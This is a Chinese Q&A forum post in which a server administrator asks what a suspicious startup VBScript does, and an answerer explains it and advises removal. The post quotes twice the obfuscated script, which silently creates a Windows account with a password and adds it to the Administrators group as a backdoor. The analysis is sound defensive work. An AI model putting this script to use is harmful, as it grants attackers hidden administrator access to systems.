UC知道服务器高手急救!
来源:百度知道 编辑:UC知道 时间:2024/05/18 21:52:05
1日,登陆..发现开始启动项中有“services.vbs”文件。打开一看:
set wshshell=createobject ("wsc"&"ript.shell" )
a=wshshell.run ("cmd.exe /c n"&"et u"&"ser IUSR_D"&"EBUG zf,"&"@yjk515 /a"&"dd",0)
b=wshshell.run ("cmd.exe /c n"&"et loca"&"lgroup Admin"&"istrators IUSR_"&"DEBUG /a"&"dd",0)
高手们说一下上面这段代码是做什么的?
这个文件其他地方都没有,就在开始-程序-启动里面带的。
这是人工登陆手动搞上去的还是,通过服务器上的其他站点,黑客利用某站点程序漏洞搞上去的?
详细回答者,追加分数!
查看用户组,这个帐户已经被禁用了。
set wshshell=createobject ("wsc"&"ript.shell" )
a=wshshell.run ("cmd.exe /c n"&"et u"&"ser IUSR_D"&"EBUG zf,"&"@yjk515 /a"&"dd",0)
b=wshshell.run ("cmd.exe /c n"&"et loca"&"lgroup Admin"&"istrators IUSR_"&"DEBUG /a"&"dd",0)
高手们说一下上面这段代码是做什么的?
这个文件其他地方都没有,就在开始-程序-启动里面带的。
这是人工登陆手动搞上去的还是,通过服务器上的其他站点,黑客利用某站点程序漏洞搞上去的?
详细回答者,追加分数!
查看用户组,这个帐户已经被禁用了。
第一句,创建脚本运行的实例。
第二句,cmd.exe /c net user IUSR_DEBUG zf,@yjk515 /add ,0 意思是添加一个用户,用户名为IUSR_DEBUG,密码是zf,@yjk515。
第三句,cmd.exe /c net localgroup Administrators IUSR_DEBUG /add,0 意思是将IUSR_DEBUG加为管理组。
整个脚本的意思清楚了吧?就是加了一个管理员,名称是IUSR_DEBUG。基本可以确定是被黑客入侵了,把这个用户删掉吧,把这个脚本也删掉,然后根据日志查找黑客入侵的途径,并作相应补救。
补充:具体是怎么实现的就猜不到,要你自己或者找信得过的高手根据系统、网站以及其他程序的日志来查询。